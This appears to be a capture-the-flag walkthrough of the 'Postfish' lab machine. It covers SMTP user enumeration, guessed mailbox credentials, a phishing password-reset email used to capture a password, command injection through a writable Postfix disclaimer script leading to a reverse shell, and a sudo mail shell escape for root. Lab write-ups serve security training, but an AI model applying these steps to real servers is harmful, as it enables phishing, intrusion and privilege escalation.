Postfish

added the IP and hostname to the hosts file for ease. sudo nano /etc/hosts

I then ran nmap to see which ports were open.

$ sudo nmap -sC -Pn -p- postfish.offsec                                                                    1 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-21 11:33 EST
Nmap scan report for postfish.offsec (192.168.169.137)
Host is up (0.062s latency).
Not shown: 65528 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
25/tcp  open  smtp
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_smtp-commands: postfish.off, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http
|_http-title: Site doesn't have a title (text/html).
110/tcp open  pop3
|_pop3-capabilities: USER RESP-CODES UIDL TOP CAPA AUTH-RESP-CODE STLS SASL(PLAIN) PIPELINING
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
143/tcp open  imap
|_imap-capabilities: capabilities listed SASL-IR more STARTTLS IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login ID LOGIN-REFERRALS LITERAL+ Pre-login ENABLE OK
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
993/tcp open  imaps
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: capabilities listed ID more IMAP4rev1 AUTH=PLAINA0001 IDLE have post-login LITERAL+ LOGIN-REFERRALS SASL-IR Pre-login ENABLE OK
995/tcp open  pop3s
|_pop3-capabilities: USER CAPA PIPELINING RESP-CODES UIDL SASL(PLAIN) TOP AUTH-RESP-CODE
| ssl-cert: Subject: commonName=ubuntu
| Subject Alternative Name: DNS:ubuntu
| Not valid before: 2021-01-26T10:26:37
|_Not valid after:  2031-01-24T10:26:37
|_ssl-date: TLS randomness does not represent time

Nmap done: 1 IP address (1 host up) scanned in 54.85 seconds

I noticed we had a website running on port 80. It does not have much information but there is a team page. I have seen a couple of instances where some text in that page may be related to the user's password so I create a dictionary from this page through cewl.

cewl http://postfish.off/team.html -m 5 -w team.txt

I use this custom dictionary and run it through smtp-user-enum to find available email accounts on the server. This shows us that we have sales and legal.

smtp-user-enum -U team.txt -t postfish.offsec                                                           
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... team.txt
Target count ............. 1
Username count ........... 75
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 13:10:39 2021 #########
postfish.offsec: Sales exists
postfish.offsec: Legal exists
######## Scan completed at Tue Dec 21 13:10:42 2021 #########
2 results.

75 queries in 3 seconds (25.0 queries / sec)

I also take the team member's names and iterate through common email naming schemes and run this custom dictionary through smtp-user-enum as well. This confirms the accounts naming scheme.

smtp-user-enum -U users.lst -t postfish.offsec                                               
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... VRFY
Worker Processes ......... 5
Usernames file ........... users.lst
Target count ............. 1
Username count ........... 40
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ 

######## Scan started at Tue Dec 21 11:57:31 2021 #########
postfish.offsec: claire.madison exists
postfish.offsec: mike.ross exists
postfish.offsec: brian.moore exists
postfish.offsec: sarah.lorem exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
postfish.offsec: [email protected] exists
######## Scan completed at Tue Dec 21 11:57:33 2021 #########
8 results.

40 queries in 2 seconds (20.0 queries / sec)

Trying the same username and password I see that sales has the password of sales as well. We use this information to find an email on their inbox about a password reset email that will be coming in the future.

curl -k 'imaps://postfish.offsec/INBOX;MAILINDEX=1' --user sales:sales
Return-Path: <[email protected]>
X-Original-To: [email protected]
Delivered-To: [email protected]
Received: by postfish.off (Postfix, from userid 997)
        id B277B45445; Wed, 31 Mar 2021 13:14:34 +0000 (UTC)
Received: from x (localhost [127.0.0.1])
        by postfish.off (Postfix) with SMTP id 7712145434
        for <[email protected]>; Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
Subject: ERP Registration Reminder
Message-Id: <[email protected]>
Date: Wed, 31 Mar 2021 13:11:23 +0000 (UTC)
From: [email protected]

Hi Sales team,

We will be sending out password reset links in the upcoming week so that we can get you registered on the ERP system.

Regards,
IT

We send an email to the user with a link for them to reset their password.

sendemail -t [email protected] -f [email protected] -s postfish.off -u "Password Reset" -o tls=no

we get a call back with the user's password

We can then login through ssh as brian

ssh [email protected]

Running LSE I notice a non-usual file that we have access to (/etc/postfix/disclaimer)

Reading about this file and reading the other files called within it we can derive that these files add a disclaimer text to the outgoing emails from two accounts ([email protected] and [email protected]). With this information we can try a POC.

I edit the /etc/postfix/disclaimer file and add the command

/usr/bin/ping -c 1 192.168.169.137

and send an email to [email protected] as we did before. As soon as I do, I get a ping packet on my machine (sudo tcpdump ip proto \\icmp -i tun0)

Using this information we modify our file once more and do a reverse shell to our kali box.

Now we have shell access, but this time as the 'filter' user. On here we see that sudo -l gives us sudo access to the /usr/bin/mail.

Looking for 'mail' in GTFObins we see how to take advantage of this command and easily privesc with sudo mail --exec='!/bin/sh'

PreviousPelican NextReadys

Last updated 4 years ago